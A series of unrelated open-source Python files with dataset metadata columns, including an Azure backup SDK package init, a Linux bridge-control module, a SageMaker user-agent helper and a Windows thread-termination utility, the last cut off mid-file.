] | 1 | 2018-08-28T14:36:47.000Z | 2018-08-28T14:36:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .protection_intent_operations import ProtectionIntentOperations
from .backup_status_operations import BackupStatusOperations
from .feature_support_operations import FeatureSupportOperations
from .backup_jobs_operations import BackupJobsOperations
from .job_details_operations import JobDetailsOperations
from .export_jobs_operation_results_operations import ExportJobsOperationResultsOperations
from .jobs_operations import JobsOperations
from .backup_policies_operations import BackupPoliciesOperations
from .backup_protected_items_operations import BackupProtectedItemsOperations
from .backup_usage_summaries_operations import BackupUsageSummariesOperations
from .backup_resource_vault_configs_operations import BackupResourceVaultConfigsOperations
from .backup_engines_operations import BackupEnginesOperations
from .protection_container_refresh_operation_results_operations import ProtectionContainerRefreshOperationResultsOperations
from .protectable_containers_operations import ProtectableContainersOperations
from .protection_containers_operations import ProtectionContainersOperations
from .backup_workload_items_operations import BackupWorkloadItemsOperations
from .protection_container_operation_results_operations import ProtectionContainerOperationResultsOperations
from .protected_items_operations import ProtectedItemsOperations
from .backups_operations import BackupsOperations
from .protected_item_operation_results_operations import ProtectedItemOperationResultsOperations
from .protected_item_operation_statuses_operations import ProtectedItemOperationStatusesOperations
from .recovery_points_operations import RecoveryPointsOperations
from .item_level_recovery_connections_operations import ItemLevelRecoveryConnectionsOperations
from .restores_operations import RestoresOperations
from .job_cancellations_operations import JobCancellationsOperations
from .job_operation_results_operations import JobOperationResultsOperations
from .backup_operation_results_operations import BackupOperationResultsOperations
from .backup_operation_statuses_operations import BackupOperationStatusesOperations
from .protection_policies_operations import ProtectionPoliciesOperations
from .protection_policy_operation_results_operations import ProtectionPolicyOperationResultsOperations
from .protection_policy_operation_statuses_operations import ProtectionPolicyOperationStatusesOperations
from .backup_protectable_items_operations import BackupProtectableItemsOperations
from .backup_protection_containers_operations import BackupProtectionContainersOperations
from .security_pi_ns_operations import SecurityPINsOperations
from .backup_resource_storage_configs_operations import BackupResourceStorageConfigsOperations
from .operations import Operations
__all__ = [
'ProtectionIntentOperations',
'BackupStatusOperations',
'FeatureSupportOperations',
'BackupJobsOperations',
'JobDetailsOperations',
'ExportJobsOperationResultsOperations',
'JobsOperations',
'BackupPoliciesOperations',
'BackupProtectedItemsOperations',
'BackupUsageSummariesOperations',
'BackupResourceVaultConfigsOperations',
'BackupEnginesOperations',
'ProtectionContainerRefreshOperationResultsOperations',
'ProtectableContainersOperations',
'ProtectionContainersOperations',
'BackupWorkloadItemsOperations',
'ProtectionContainerOperationResultsOperations',
'ProtectedItemsOperations',
'BackupsOperations',
'ProtectedItemOperationResultsOperations',
'ProtectedItemOperationStatusesOperations',
'RecoveryPointsOperations',
'ItemLevelRecoveryConnectionsOperations',
'RestoresOperations',
'JobCancellationsOperations',
'JobOperationResultsOperations',
'BackupOperationResultsOperations',
'BackupOperationStatusesOperations',
'ProtectionPoliciesOperations',
'ProtectionPolicyOperationResultsOperations',
'ProtectionPolicyOperationStatusesOperations',
'BackupProtectableItemsOperations',
'BackupProtectionContainersOperations',
'SecurityPINsOperations',
'BackupResourceStorageConfigsOperations',
'Operations',
]
| 52.908046 | 123 | 0.847056 |
from .protection_intent_operations import ProtectionIntentOperations
from .backup_status_operations import BackupStatusOperations
from .feature_support_operations import FeatureSupportOperations
from .backup_jobs_operations import BackupJobsOperations
from .job_details_operations import JobDetailsOperations
from .export_jobs_operation_results_operations import ExportJobsOperationResultsOperations
from .jobs_operations import JobsOperations
from .backup_policies_operations import BackupPoliciesOperations
from .backup_protected_items_operations import BackupProtectedItemsOperations
from .backup_usage_summaries_operations import BackupUsageSummariesOperations
from .backup_resource_vault_configs_operations import BackupResourceVaultConfigsOperations
from .backup_engines_operations import BackupEnginesOperations
from .protection_container_refresh_operation_results_operations import ProtectionContainerRefreshOperationResultsOperations
from .protectable_containers_operations import ProtectableContainersOperations
from .protection_containers_operations import ProtectionContainersOperations
from .backup_workload_items_operations import BackupWorkloadItemsOperations
from .protection_container_operation_results_operations import ProtectionContainerOperationResultsOperations
from .protected_items_operations import ProtectedItemsOperations
from .backups_operations import BackupsOperations
from .protected_item_operation_results_operations import ProtectedItemOperationResultsOperations
from .protected_item_operation_statuses_operations import ProtectedItemOperationStatusesOperations
from .recovery_points_operations import RecoveryPointsOperations
from .item_level_recovery_connections_operations import ItemLevelRecoveryConnectionsOperations
from .restores_operations import RestoresOperations
from .job_cancellations_operations import JobCancellationsOperations
from .job_operation_results_operations import JobOperationResultsOperations
from .backup_operation_results_operations import BackupOperationResultsOperations
from .backup_operation_statuses_operations import BackupOperationStatusesOperations
from .protection_policies_operations import ProtectionPoliciesOperations
from .protection_policy_operation_results_operations import ProtectionPolicyOperationResultsOperations
from .protection_policy_operation_statuses_operations import ProtectionPolicyOperationStatusesOperations
from .backup_protectable_items_operations import BackupProtectableItemsOperations
from .backup_protection_containers_operations import BackupProtectionContainersOperations
from .security_pi_ns_operations import SecurityPINsOperations
from .backup_resource_storage_configs_operations import BackupResourceStorageConfigsOperations
from .operations import Operations
__all__ = [
'ProtectionIntentOperations',
'BackupStatusOperations',
'FeatureSupportOperations',
'BackupJobsOperations',
'JobDetailsOperations',
'ExportJobsOperationResultsOperations',
'JobsOperations',
'BackupPoliciesOperations',
'BackupProtectedItemsOperations',
'BackupUsageSummariesOperations',
'BackupResourceVaultConfigsOperations',
'BackupEnginesOperations',
'ProtectionContainerRefreshOperationResultsOperations',
'ProtectableContainersOperations',
'ProtectionContainersOperations',
'BackupWorkloadItemsOperations',
'ProtectionContainerOperationResultsOperations',
'ProtectedItemsOperations',
'BackupsOperations',
'ProtectedItemOperationResultsOperations',
'ProtectedItemOperationStatusesOperations',
'RecoveryPointsOperations',
'ItemLevelRecoveryConnectionsOperations',
'RestoresOperations',
'JobCancellationsOperations',
'JobOperationResultsOperations',
'BackupOperationResultsOperations',
'BackupOperationStatusesOperations',
'ProtectionPoliciesOperations',
'ProtectionPolicyOperationResultsOperations',
'ProtectionPolicyOperationStatusesOperations',
'BackupProtectableItemsOperations',
'BackupProtectionContainersOperations',
'SecurityPINsOperations',
'BackupResourceStorageConfigsOperations',
'Operations',
]
| true | true |
f7fa27a71420271bd51bcaa911ebeaf7366f0c78 | 4,529 | py | Python | pynetlinux/brctl.py | youngage/pynetlinux | 4bb6f2ce42c22bc853f7a2af10591da89968e1ff | [
"BSD-3-Clause"
] | 1 | 2015-02-10T14:14:04.000Z | 2015-02-10T14:14:04.000Z | pynetlinux/brctl.py | youngage/pynetlinux | 4bb6f2ce42c22bc853f7a2af10591da89968e1ff | [
"BSD-3-Clause"
] | null | null | null | pynetlinux/brctl.py | youngage/pynetlinux | 4bb6f2ce42c22bc853f7a2af10591da89968e1ff | [
"BSD-3-Clause"
] | null | null | null | import array
import fcntl
import os
import struct
from . import ifconfig
SYSFS_NET_PATH = "/sys/class/net"
# From linux/sockios.h
SIOCBRADDBR = 0x89a0
SIOCBRDELBR = 0x89a1
SIOCBRADDIF = 0x89a2
SIOCBRDELIF = 0x89a3
SIOCDEVPRIVATE = 0x89F0
# From bridge-utils if_bridge.h
BRCTL_SET_BRIDGE_FORWARD_DELAY = 8
BRCTL_SET_BRIDGE_STP_STATE = 14
BRCTL_GET_BRIDGE_INFO = 6
if not os.path.isdir(SYSFS_NET_PATH):
raise ImportError("Path %s not found. This module requires sysfs." % SYSFS_NET_PATH)
class Bridge(ifconfig.Interface):
''' Class representing a Linux Ethernet bridge. '''
def __init__(self, name):
ifconfig.Interface.__init__(self, name)
def iterifs(self):
''' Iterate over all the interfaces in this bridge. '''
if_path = os.path.join(SYSFS_NET_PATH, self.name, "brif")
net_files = os.listdir(if_path)
for iface in net_files:
yield iface
def listif(self):
''' List interface names. '''
return [p for p in self.iterifs()]
def addif(self, iface):
''' Add the interface with the given name to this bridge. Equivalent to
brctl addif [bridge] [interface]. '''
if type(iface) == ifconfig.Interface:
devindex = iface.index
else:
devindex = ifconfig.Interface(iface).index
ifreq = struct.pack('16si', self.name, devindex)
fcntl.ioctl(ifconfig.sockfd, SIOCBRADDIF, ifreq)
return self
def delif(self, iface):
''' Remove the interface with the given name from this bridge.
Equivalent to brctl delif [bridge] [interface]'''
if type(iface) == ifconfig.Interface:
devindex = iface.index
else:
devindex = ifconfig.Interface(iface).index
ifreq = struct.pack('16si', self.name, devindex)
fcntl.ioctl(ifconfig.sockfd, SIOCBRDELIF, ifreq)
return self
def set_stp_mode(self, status):
'''Set the status of spanning tree on bridge.
Called using bridge.set_stp_mode([True,False])'''
if status is True:
status = 1
else:
status = 0
data = array.array('L', [BRCTL_SET_BRIDGE_STP_STATE, status, 0, 0])
buffer, _items = data.buffer_info()
ifreq = struct.pack('16sP', self.name, buffer)
fcntl.ioctl(ifconfig.sockfd, SIOCDEVPRIVATE, ifreq)
return True
def set_forward_delay(self, delay):
''' Set the given bridge forward delay (in seconds). '''
# delay is passed to kernel in "jiffies" (100ths of a second)
jiffies = int(delay*100)
data = array.array('L', [BRCTL_SET_BRIDGE_FORWARD_DELAY, jiffies, 0, 0])
buffer, _items = data.buffer_info()
ifreq = struct.pack('16sP', self.name, buffer)
fcntl.ioctl(ifconfig.sockfd, SIOCDEVPRIVATE, ifreq)
return self
def delete(self):
''' Brings down the bridge interface, and removes it. Equivalent to
ifconfig [bridge] down && brctl delbr [bridge]. '''
self.down()
fcntl.ioctl(ifconfig.sockfd, SIOCBRDELBR, self.name)
return self
def get_ip(self):
''' Bridges don't have IP addresses, so this always returns 0.0.0.0. '''
return "0.0.0.0"
ip = property(get_ip)
def shutdown():
''' Shut down bridge library '''
ifconfig.shutdown()
def iterbridges():
''' Iterate over all the bridges in the system. '''
net_files = os.listdir(SYSFS_NET_PATH)
for d in net_files:
path = os.path.join(SYSFS_NET_PATH, d)
if not os.path.isdir(path):
continue
if os.path.exists(os.path.join(path, "bridge")):
yield Bridge(d)
def list_bridges():
''' Return a list of the names of the bridge interfaces. '''
return [br for br in iterbridges()]
def addbr(name):
''' Create new bridge with the given name '''
fcntl.ioctl(ifconfig.sockfd, SIOCBRADDBR, name)
return Bridge(name)
def findif(name):
''' Find the given interface name within any of the bridges. Return the
Bridge object corresponding to the bridge containing the interface, or
None if no such bridge could be found. '''
for br in iterbridges():
if name in br.iterifs():
return br
return None
def findbridge(name):
''' Find the given bridge. Return the Bridge object, or None if no such
bridge could be found. '''
for br in iterbridges():
if br.name == name:
return br
return None
| 30.809524 | 88 | 0.632369 | import array
import fcntl
import os
import struct
from . import ifconfig
SYSFS_NET_PATH = "/sys/class/net"
SIOCBRADDBR = 0x89a0
SIOCBRDELBR = 0x89a1
SIOCBRADDIF = 0x89a2
SIOCBRDELIF = 0x89a3
SIOCDEVPRIVATE = 0x89F0
BRCTL_SET_BRIDGE_FORWARD_DELAY = 8
BRCTL_SET_BRIDGE_STP_STATE = 14
BRCTL_GET_BRIDGE_INFO = 6
if not os.path.isdir(SYSFS_NET_PATH):
raise ImportError("Path %s not found. This module requires sysfs." % SYSFS_NET_PATH)
class Bridge(ifconfig.Interface):
def __init__(self, name):
ifconfig.Interface.__init__(self, name)
def iterifs(self):
if_path = os.path.join(SYSFS_NET_PATH, self.name, "brif")
net_files = os.listdir(if_path)
for iface in net_files:
yield iface
def listif(self):
return [p for p in self.iterifs()]
def addif(self, iface):
if type(iface) == ifconfig.Interface:
devindex = iface.index
else:
devindex = ifconfig.Interface(iface).index
ifreq = struct.pack('16si', self.name, devindex)
fcntl.ioctl(ifconfig.sockfd, SIOCBRADDIF, ifreq)
return self
def delif(self, iface):
if type(iface) == ifconfig.Interface:
devindex = iface.index
else:
devindex = ifconfig.Interface(iface).index
ifreq = struct.pack('16si', self.name, devindex)
fcntl.ioctl(ifconfig.sockfd, SIOCBRDELIF, ifreq)
return self
def set_stp_mode(self, status):
if status is True:
status = 1
else:
status = 0
data = array.array('L', [BRCTL_SET_BRIDGE_STP_STATE, status, 0, 0])
buffer, _items = data.buffer_info()
ifreq = struct.pack('16sP', self.name, buffer)
fcntl.ioctl(ifconfig.sockfd, SIOCDEVPRIVATE, ifreq)
return True
def set_forward_delay(self, delay):
jiffies = int(delay*100)
data = array.array('L', [BRCTL_SET_BRIDGE_FORWARD_DELAY, jiffies, 0, 0])
buffer, _items = data.buffer_info()
ifreq = struct.pack('16sP', self.name, buffer)
fcntl.ioctl(ifconfig.sockfd, SIOCDEVPRIVATE, ifreq)
return self
def delete(self):
self.down()
fcntl.ioctl(ifconfig.sockfd, SIOCBRDELBR, self.name)
return self
def get_ip(self):
return "0.0.0.0"
ip = property(get_ip)
def shutdown():
ifconfig.shutdown()
def iterbridges():
net_files = os.listdir(SYSFS_NET_PATH)
for d in net_files:
path = os.path.join(SYSFS_NET_PATH, d)
if not os.path.isdir(path):
continue
if os.path.exists(os.path.join(path, "bridge")):
yield Bridge(d)
def list_bridges():
return [br for br in iterbridges()]
def addbr(name):
fcntl.ioctl(ifconfig.sockfd, SIOCBRADDBR, name)
return Bridge(name)
def findif(name):
for br in iterbridges():
if name in br.iterifs():
return br
return None
def findbridge(name):
for br in iterbridges():
if br.name == name:
return br
return None
| true | true |
f7fa28d110e8b350f1736229ea8426be41350920 | 3,569 | py | Python | intersight/models/sdcard_policy_ref.py | ategaw-cisco/intersight-python | 9d6476620507281b1dc358e29ac452d56081bbb0 | [
"Apache-2.0"
] | null | null | null | intersight/models/sdcard_policy_ref.py | ategaw-cisco/intersight-python | 9d6476620507281b1dc358e29ac452d56081bbb0 | [
"Apache-2.0"
] | null | null | null | intersight/models/sdcard_policy_ref.py | ategaw-cisco/intersight-python | 9d6476620507281b1dc358e29ac452d56081bbb0 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Intersight REST API
This is Intersight REST API
OpenAPI spec version: 1.0.9-262
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class SdcardPolicyRef(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'moid': 'str',
'object_type': 'str'
}
attribute_map = {
'moid': 'Moid',
'object_type': 'ObjectType'
}
def __init__(self, moid=None, object_type=None):
"""
SdcardPolicyRef - a model defined in Swagger
"""
self._moid = None
self._object_type = None
if moid is not None:
self.moid = moid
if object_type is not None:
self.object_type = object_type
@property
def moid(self):
"""
Gets the moid of this SdcardPolicyRef.
:return: The moid of this SdcardPolicyRef.
:rtype: str
"""
return self._moid
@moid.setter
def moid(self, moid):
"""
Sets the moid of this SdcardPolicyRef.
:param moid: The moid of this SdcardPolicyRef.
:type: str
"""
self._moid = moid
@property
def object_type(self):
"""
Gets the object_type of this SdcardPolicyRef.
:return: The object_type of this SdcardPolicyRef.
:rtype: str
"""
return self._object_type
@object_type.setter
def object_type(self, object_type):
"""
Sets the object_type of this SdcardPolicyRef.
:param object_type: The object_type of this SdcardPolicyRef.
:type: str
"""
self._object_type = object_type
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, SdcardPolicyRef):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 23.793333 | 77 | 0.536285 |
from pprint import pformat
from six import iteritems
import re
class SdcardPolicyRef(object):
swagger_types = {
'moid': 'str',
'object_type': 'str'
}
attribute_map = {
'moid': 'Moid',
'object_type': 'ObjectType'
}
def __init__(self, moid=None, object_type=None):
self._moid = None
self._object_type = None
if moid is not None:
self.moid = moid
if object_type is not None:
self.object_type = object_type
@property
def moid(self):
return self._moid
@moid.setter
def moid(self, moid):
self._moid = moid
@property
def object_type(self):
return self._object_type
@object_type.setter
def object_type(self, object_type):
self._object_type = object_type
def to_dict(self):
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, SdcardPolicyRef):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
f7fa29e5a7ab84acfe14c474fc4808dbb31215d9 | 1,956 | py | Python | src/sagemaker/user_agent.py | billdoors/sagemaker-python-sdk | 2df8fb616cc3e28032aae5dccdc93a0c340b6d8b | [
"Apache-2.0"
] | null | null | null | src/sagemaker/user_agent.py | billdoors/sagemaker-python-sdk | 2df8fb616cc3e28032aae5dccdc93a0c340b6d8b | [
"Apache-2.0"
] | null | null | null | src/sagemaker/user_agent.py | billdoors/sagemaker-python-sdk | 2df8fb616cc3e28032aae5dccdc93a0c340b6d8b | [
"Apache-2.0"
] | null | null | null | # Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Placeholder docstring"""
from __future__ import absolute_import
import platform
import sys
import pkg_resources
import boto3
import botocore
SDK_VERSION = pkg_resources.require("sagemaker")[0].version
OS_NAME = platform.system() or "UnresolvedOS"
OS_VERSION = platform.release() or "UnresolvedOSVersion"
PYTHON_VERSION = "{}.{}.{}".format(
sys.version_info.major, sys.version_info.minor, sys.version_info.micro
)
def determine_prefix():
"""Placeholder docstring"""
prefix = "AWS-SageMaker-Python-SDK/{} Python/{} {}/{} Boto3/{} Botocore/{}".format(
SDK_VERSION, PYTHON_VERSION, OS_NAME, OS_VERSION, boto3.__version__, botocore.__version__
)
try:
with open("/etc/opt/ml/sagemaker-notebook-instance-version.txt") as sagemaker_nbi_file:
prefix = "AWS-SageMaker-Notebook-Instance/{} {}".format(
sagemaker_nbi_file.read().strip(), prefix
)
except IOError:
# This file isn't expected to always exist, and we DO want to silently ignore failures.
pass
return prefix
def prepend_user_agent(client):
"""
Args:
client:
"""
prefix = determine_prefix()
if client._client_config.user_agent is None:
client._client_config.user_agent = prefix
else:
client._client_config.user_agent = "{} {}".format(prefix, client._client_config.user_agent)
| 32.6 | 99 | 0.706033 |
from __future__ import absolute_import
import platform
import sys
import pkg_resources
import boto3
import botocore
SDK_VERSION = pkg_resources.require("sagemaker")[0].version
OS_NAME = platform.system() or "UnresolvedOS"
OS_VERSION = platform.release() or "UnresolvedOSVersion"
PYTHON_VERSION = "{}.{}.{}".format(
sys.version_info.major, sys.version_info.minor, sys.version_info.micro
)
def determine_prefix():
prefix = "AWS-SageMaker-Python-SDK/{} Python/{} {}/{} Boto3/{} Botocore/{}".format(
SDK_VERSION, PYTHON_VERSION, OS_NAME, OS_VERSION, boto3.__version__, botocore.__version__
)
try:
with open("/etc/opt/ml/sagemaker-notebook-instance-version.txt") as sagemaker_nbi_file:
prefix = "AWS-SageMaker-Notebook-Instance/{} {}".format(
sagemaker_nbi_file.read().strip(), prefix
)
except IOError:
pass
return prefix
def prepend_user_agent(client):
prefix = determine_prefix()
if client._client_config.user_agent is None:
client._client_config.user_agent = prefix
else:
client._client_config.user_agent = "{} {}".format(prefix, client._client_config.user_agent)
| true | true |
f7fa2b3d59211ad6105b40a77f692272a55b042e | 416 | py | Python | game (1).py | Deadly-Stricker/mango | 8c63faa1584831bb95c5746920ea0d62d2f5e868 | [
"MIT"
] | null | null | null | game (1).py | Deadly-Stricker/mango | 8c63faa1584831bb95c5746920ea0d62d2f5e868 | [
"MIT"
] | null | null | null | game (1).py | Deadly-Stricker/mango | 8c63faa1584831bb95c5746920ea0d62d2f5e868 | [
"MIT"
] | null | null | null | import random as r
g=0
for i in range(0,100):
a=r.randint(0,10)
y=int(input("Enter a number between 0 and 10 (0 inclusive): "))
if y==a:
g=g+1
print("You Guessed Right the answer was: ",a)
print("You earned a guessing gem ,Your gems are: ",g)
else:
print("You guessed wrong, the answer was: ",a)
print("Your gems count is: ",g)
| 27.733333 | 68 | 0.538462 | import random as r
g=0
for i in range(0,100):
a=r.randint(0,10)
y=int(input("Enter a number between 0 and 10 (0 inclusive): "))
if y==a:
g=g+1
print("You Guessed Right the answer was: ",a)
print("You earned a guessing gem ,Your gems are: ",g)
else:
print("You guessed wrong, the answer was: ",a)
print("Your gems count is: ",g)
| true | true |
f7fa2c22df6055e8f1b0a42f510e899a632aaa49 | 2,437 | py | Python | os_apply_config/collect_config.py | mail2nsrajesh/os-apply-config | c2e15c8424de6ee260bc7266f813030d62246945 | [
"Apache-2.0"
] | null | null | null | os_apply_config/collect_config.py | mail2nsrajesh/os-apply-config | c2e15c8424de6ee260bc7266f813030d62246945 | [
"Apache-2.0"
] | null | null | null | os_apply_config/collect_config.py | mail2nsrajesh/os-apply-config | c2e15c8424de6ee260bc7266f813030d62246945 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
import os
from os_apply_config import config_exception as exc
def read_configs(config_files):
'''Generator yields data from any existing file in list config_files.'''
for input_path in [x for x in config_files if x]:
if os.path.exists(input_path):
try:
with open(input_path) as input_file:
yield((input_file.read(), input_path))
except IOError as e:
raise exc.ConfigException('Could not open %s for reading. %s' %
(input_path, e))
def parse_configs(config_data):
'''Generator yields parsed json for each item passed in config_data.'''
for input_data, input_path in config_data:
try:
yield(json.loads(input_data))
except ValueError:
raise exc.ConfigException('Could not parse metadata file: %s' %
input_path)
def _deep_merge_dict(a, b):
if not isinstance(b, dict):
return b
new_dict = copy.deepcopy(a)
for k, v in iter(b.items()):
if k in new_dict and isinstance(new_dict[k], dict):
new_dict[k] = _deep_merge_dict(new_dict[k], v)
else:
new_dict[k] = copy.deepcopy(v)
return new_dict
def merge_configs(parsed_configs):
'''Returns deep-merged dict from passed list of dicts.'''
final_conf = {}
for conf in parsed_configs:
if conf:
final_conf = _deep_merge_dict(final_conf, conf)
return final_conf
def collect_config(os_config_files, fallback_paths=None):
'''Convenience method to read, parse, and merge all paths.'''
if fallback_paths:
os_config_files = fallback_paths + os_config_files
return merge_configs(parse_configs(read_configs(os_config_files)))
| 34.323944 | 79 | 0.663931 |
import copy
import json
import os
from os_apply_config import config_exception as exc
def read_configs(config_files):
for input_path in [x for x in config_files if x]:
if os.path.exists(input_path):
try:
with open(input_path) as input_file:
yield((input_file.read(), input_path))
except IOError as e:
raise exc.ConfigException('Could not open %s for reading. %s' %
(input_path, e))
def parse_configs(config_data):
for input_data, input_path in config_data:
try:
yield(json.loads(input_data))
except ValueError:
raise exc.ConfigException('Could not parse metadata file: %s' %
input_path)
def _deep_merge_dict(a, b):
if not isinstance(b, dict):
return b
new_dict = copy.deepcopy(a)
for k, v in iter(b.items()):
if k in new_dict and isinstance(new_dict[k], dict):
new_dict[k] = _deep_merge_dict(new_dict[k], v)
else:
new_dict[k] = copy.deepcopy(v)
return new_dict
def merge_configs(parsed_configs):
final_conf = {}
for conf in parsed_configs:
if conf:
final_conf = _deep_merge_dict(final_conf, conf)
return final_conf
def collect_config(os_config_files, fallback_paths=None):
if fallback_paths:
os_config_files = fallback_paths + os_config_files
return merge_configs(parse_configs(read_configs(os_config_files)))
| true | true |
f7fa2cc9fba52e7116ca3beec7518e45bd0501d7 | 423 | py | Python | permission_check/permission_check.py | srgrj/permission_check | 213c2e924c8de660103c203df50590e2da01884c | [
"MIT"
] | null | null | null | permission_check/permission_check.py | srgrj/permission_check | 213c2e924c8de660103c203df50590e2da01884c | [
"MIT"
] | null | null | null | permission_check/permission_check.py | srgrj/permission_check | 213c2e924c8de660103c203df50590e2da01884c | [
"MIT"
] | null | null | null | import os
from permission_check.utils import Permission
class PermissionCheck:
def __init__(self, path):
self.path = path
self.stat = os.stat(self.path)
self.permissions = oct(self.stat.st_mode)[-3:]
self.owner = Permission(permission=self.permissions[0])
self.group = Permission(permission=self.permissions[0])
self.others = Permission(permission=self.permissions[0])
| 32.538462 | 64 | 0.690307 | import os
from permission_check.utils import Permission
class PermissionCheck:
def __init__(self, path):
self.path = path
self.stat = os.stat(self.path)
self.permissions = oct(self.stat.st_mode)[-3:]
self.owner = Permission(permission=self.permissions[0])
self.group = Permission(permission=self.permissions[0])
self.others = Permission(permission=self.permissions[0])
| true | true |
f7fa2d932f3bc20229b405dcc2c1eeedca11932a | 3,312 | py | Python | T800/winthread.py | sakurai-youhei/T800.winthread | 30e9d61f003dc15d141e2633918abd29f5726eac | [
"MIT"
] | null | null | null | T800/winthread.py | sakurai-youhei/T800.winthread | 30e9d61f003dc15d141e2633918abd29f5726eac | [
"MIT"
] | null | null | null | T800/winthread.py | sakurai-youhei/T800.winthread | 30e9d61f003dc15d141e2633918abd29f5726eac | [
"MIT"
] | null | null | null | '''
Created on 2017/05/11
Licensed under MIT
@author: sakurai
'''
from contextlib import contextmanager
from ctypes import c_int
from ctypes import POINTER
from ctypes import windll
from ctypes import WinError
from ctypes import wintypes
from threading import _active
from threading import _active_limbo_lock
from threading import Lock
from threading import Thread
import warnings
__all__ = ["ThreadTerminationWarning", "TerminatableThread"]
def assertNotNULL(result, func, args):
if result == POINTER(c_int)():
raise WinError()
return args
def assertTrue(result, func, args):
if not result:
raise WinError()
return args
# https://msdn.microsoft.com/en-US/library/windows/apps/ms684335.aspx
OpenThread = windll.kernel32.OpenThread
OpenThread.restype = wintypes.HANDLE
OpenThread.argtypes = (wintypes.DWORD, wintypes.BOOL, wintypes.DWORD)
OpenThread.errcheck = assertNotNULL
OpenThread.__doc__ = """\
HANDLE OpenThread(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwThreadId
);
"""
# https://msdn.microsoft.com/en-US/library/windows/desktop/ms686717.aspx
TerminateThread = windll.kernel32.TerminateThread
TerminateThread.restype = wintypes.BOOL
TerminateThread.argtypes = (wintypes.HANDLE, wintypes.DWORD)
TerminateThread.errcheck = assertTrue
TerminateThread.__doc__ = """\
BOOL WINAPI TerminateThread(
_Inout_ HANDLE hThread,
_In_ DWORD dwExitCode
);
"""
# https://msdn.microsoft.com/en-US/library/windows/desktop/ms724211.aspx
CloseHandle = windll.kernel32.CloseHandle
CloseHandle.restype = wintypes.BOOL
CloseHandle.argtypes = (wintypes.HANDLE, )
CloseHandle.errcheck = assertTrue
CloseHandle.__doc__ = """\
BOOL WINAPI CloseHandle(
_In_ HANDLE hObject
);
"""
# https://msdn.microsoft.com/en-us/library/windows/apps/ms686769.aspx
THREAD_TERMINATE = 0x0001
@contextmanager
def closing(handle):
yield handle
CloseHandle(handle)
class ThreadTerminationWarning(RuntimeWarning):
pass
class TerminatableThread(Thread):
__termination_lock = Lock()
def terminate(self, exit_code=1):
"""Terminate thread using Win32 API with freeing *less* resources"""
with self.__termination_lock:
warnings.warn(
"Be aware that thread (ident=%s, name=%s) is being terminated "
"by non-standard way, it would cause various problems such as "
"generating uncollectable objects bounded to the thread and "
"so on." % (self.ident, self.name),
category=ThreadTerminationWarning, stacklevel=2)
# Terminating native thread by Win32 API.
with closing(OpenThread(THREAD_TERMINATE, False, self.ident)) as h:
TerminateThread(h, exit_code)
with _active_limbo_lock:
# Updating table recording all active threads.
del _active[self.ident]
# Masquerading as stopped (Ordered from modern to ancient ways)
if hasattr(self, "_is_stopped"): # Py3.6
self._is_stopped = True
self._tstate_lock.release()
elif hasattr(self, "_stop"): # Py3.3
self._stop()
elif hasattr(self, "_Thread__stop"): # Py2.7
self._Thread__stop()
| 28.8 | 79 | 0.692633 |
from contextlib import contextmanager
from ctypes import c_int
from ctypes import POINTER
from ctypes import windll
from ctypes import WinError
from ctypes import wintypes
from threading import _active
from threading import _active_limbo_lock
from threading import Lock
from threading import Thread
import warnings
__all__ = ["ThreadTerminationWarning", "TerminatableThread"]
def assertNotNULL(result, func, args):
if result == POINTER(c_int)():
raise WinError()
return args
def assertTrue(result, func, args):
if not result:
raise WinError()
return args
OpenThread = windll.kernel32.OpenThread
OpenThread.restype = wintypes.HANDLE
OpenThread.argtypes = (wintypes.DWORD, wintypes.BOOL, wintypes.DWORD)
OpenThread.errcheck = assertNotNULL
OpenThread.__doc__ = """\
HANDLE OpenThread(
